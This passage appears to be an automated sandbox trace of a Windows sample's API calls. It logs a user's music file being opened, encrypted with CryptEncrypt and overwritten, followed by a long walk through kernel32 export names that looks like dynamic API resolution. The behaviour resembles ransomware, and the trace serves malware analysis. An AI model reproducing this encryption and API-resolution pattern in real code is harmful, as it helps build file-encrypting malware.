(lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\RAZ7\\eT6JvIsf5PzgpcQ4Oo.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\raz7\\et6jvisf5pzgpcq4oo.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x428 [0085.600] GetFileSizeEx (in: hFile=0x428, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=46746) returned 1 [0085.601] CreateFileMappingW (hFile=0x428, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0085.601] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0085.601] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0085.601] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0085.601] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.601] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0085.601] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0085.602] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.602] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0085.603] CloseHandle (hObject=0x42c) returned 1 [0085.603] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.603] WriteFile (in: hFile=0x428, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0085.604] CloseHandle (hObject=0x0) returned 0 [0085.604] CloseHandle (hObject=0x428) returned 1 [0085.604] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.604] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.605] GetTickCount () returned 0x114ddb2 [0085.605] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0085.605] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0085.605] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0085.605] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0085.605] lstrlenA (lpString="kernel32.dll") returned 12 [0085.605] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0085.605] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0085.606] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0085.606] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0085.606] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0085.606] lstrlenA (lpString="ADDATOMA") returned 8 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0085.606] lstrlenA (lpString="ADDATOMW") returned 8 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0085.606] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0085.606] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0085.606] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0085.606] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0085.606] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0085.606] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0085.606] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0085.606] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0085.606] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0085.606] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0085.606] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0085.606] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0085.606] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0085.606] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0085.606] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0085.607] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0085.607] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0085.607] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0085.607] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0085.607] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0085.607] lstrlenA (lpString="BACKUPREAD") returned 10 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0085.607] lstrlenA (lpString="BACKUPSEEK") returned 10 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0085.607] lstrlenA (lpString="BACKUPWRITE") returned 11 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0085.607] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0085.607] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0085.607] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0085.607] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0085.607] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0085.607] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0085.607] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0085.607] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0085.607] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0085.607] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0085.607] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0085.608] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0085.608] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0085.608] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0085.608] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0085.608] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0085.608] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0085.608] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0085.608] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0085.608] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0085.608] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0085.608] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0085.608] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0085.608] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0085.608] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0085.608] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0085.608] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0085.608] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0085.608] lstrlenA (lpString="BEEP") returned 4 [0085.608] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0085.608] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0085.609] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0085.609] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0085.609] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0085.609] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0085.609] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0085.609] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0085.609] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0085.609] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0085.609] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0085.609] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0085.610] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0085.610] lstrlenA (lpString="CANCELIO") returned 8 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0085.610] lstrlenA (lpString="CANCELIOEX") returned 10 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0085.610] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0085.610] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0085.610] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0085.610] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0085.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0085.610] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0085.611] lstrlenA (lpString="CHECKELEVATION") returned 14 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0085.611] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0085.611] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0085.611] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0085.611] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0085.611] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0085.611] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0085.611] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0085.611] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0085.611] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0085.611] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0085.611] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0085.611] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0085.611] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0085.611] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0085.611] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0085.611] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0085.611] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0085.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0085.612] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0085.612] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0085.612] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0085.612] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0085.612] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0085.612] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0085.612] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0085.612] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0085.612] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0085.612] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0085.612] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0085.612] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0085.612] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0085.612] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0085.612] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0085.612] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" 